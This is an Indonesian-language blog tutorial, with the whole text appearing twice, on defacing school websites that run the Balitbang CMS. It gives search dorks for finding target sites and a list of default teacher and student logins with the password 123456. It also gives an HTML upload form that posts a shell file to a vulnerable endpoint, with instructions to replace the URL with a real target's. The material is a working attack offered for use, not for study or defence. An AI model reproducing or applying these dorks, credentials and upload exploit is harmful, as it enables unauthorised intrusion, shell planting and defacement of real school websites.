Deface Dengan Default Member CMS Balitbang
Tutorial Deface Web Metode Default Member CMS Balitbang
Mr.X98
Dork :
intext:Website engine's code is copyright © 2013 Tim Balitbang Depdiknas versi 3.5
inurl:"/html/guru.php?id="
inurl:"/html/siswa.php?id="
Kembangin lagi sendiri :P
Exploitasi url target menjadi alamatkorban.sch.id/member atau /users
Gunakan salah satu default user dibawah ini untuk login :
USERNAME PASSWORD DETAILS SHELL UPLOAD
alan 123456 guru available
kickdody 123456 guru available
siswanto 123456 guru available
choirulyogya 123456 guru available
wardjana 123456 guru available
taufik 123456 guru available
tomi 123456 guru available
alumni 123456 siswa not available
070810120 123456 siswa not available
CSRF :
</head>
<br><br><br><br><br><br><br><br><br><br><br><br><br>
<body>
<link href='http://fonts.googleapis.com/css?family=Iceland' rel='stylesheet' type='text/css'>
<center><font face="Iceland"><font size="7" color=Silver>Lamongan Xploiter</font></center>
<link href='http://fonts.googleapis.com/css?family=Iceland' rel='stylesheet' type='text/css'>
<center><form enctype="multipart/form-data" action="http://target/functions/simmateriguru.php" method="post"></center>
<center><input name="file" type="file"><input type="submit" value="Upload"></center>
NB : Ganti URL dengan url target kalian
Shell akses ???use your brain :P
Lebih jelasnya lihat videonya dibawah ini
Mr.X98
Dork :
intext:Website engine's code is copyright © 2013 Tim Balitbang Depdiknas versi 3.5
inurl:"/html/guru.php?id="
inurl:"/html/siswa.php?id="
Kembangin lagi sendiri :P
Exploitasi url target menjadi alamatkorban.sch.id/member atau /users
Gunakan salah satu default user dibawah ini untuk login :
USERNAME PASSWORD DETAILS SHELL UPLOAD
alan 123456 guru available
kickdody 123456 guru available
siswanto 123456 guru available
choirulyogya 123456 guru available
wardjana 123456 guru available
taufik 123456 guru available
tomi 123456 guru available
alumni 123456 siswa not available
070810120 123456 siswa not available
CSRF :
</head>
<br><br><br><br><br><br><br><br><br><br><br><br><br>
<body>
<link href='http://fonts.googleapis.com/css?family=Iceland' rel='stylesheet' type='text/css'>
<center><font face="Iceland"><font size="7" color=Silver>Lamongan Xploiter</font></center>
<link href='http://fonts.googleapis.com/css?family=Iceland' rel='stylesheet' type='text/css'>
<center><form enctype="multipart/form-data" action="http://target/functions/simmateriguru.php" method="post"></center>
<center><input name="file" type="file"><input type="submit" value="Upload"></center>
NB : Ganti URL dengan url target kalian
Shell akses ???use your brain :P
Lebih jelasnya lihat videonya dibawah ini
Komentar
Posting Komentar